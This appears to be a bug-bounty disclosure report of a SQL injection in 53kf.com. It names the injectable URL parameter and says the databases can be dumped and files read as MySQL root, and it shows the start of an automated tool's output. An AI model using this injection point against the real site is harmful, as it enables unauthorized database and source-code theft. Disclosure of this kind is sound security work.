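### Brief description:
A severe SQL injection vulnerability in 53kf.com allows the databases of the main site and several of its sub-sites to be dumped. The MySQL user is root; files cannot be written, but they can be read, so all of the file source code is exposed. Since I could not find the admin backend, I have not obtained a webshell for now; with or without a shell this will probably be 20 Rank either way, so I did not bother. I am borrowing clzzy's description to save myself the typing! Asking for a gift.
### Detailed description:
A severe SQL injection vulnerability in 53kf.com allows the databases of the main site and several of its sub-sites to be dumped. The MySQL user is root; files cannot be written, but they can be read, so all of the file source code is exposed. Since I could not find the admin backend, I have not obtained a webshell for now; with or without a shell this will probably be 20 Rank either way, so I did not bother. I am borrowing clzzy's description to save myself the typing! Asking for a gift.
### Proof of vulnerability: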
Target: http://kf1.53kf.com/iframe_brief.php?style_id=%Inject_Here%&language=cn10009
Date: 2012/10/11 10:24:38
DB Detection: MySQL >=5 (Auto Detected)
Method: GET
Type: Integer (Auto Detected)
------------------------------------------------------
Data tables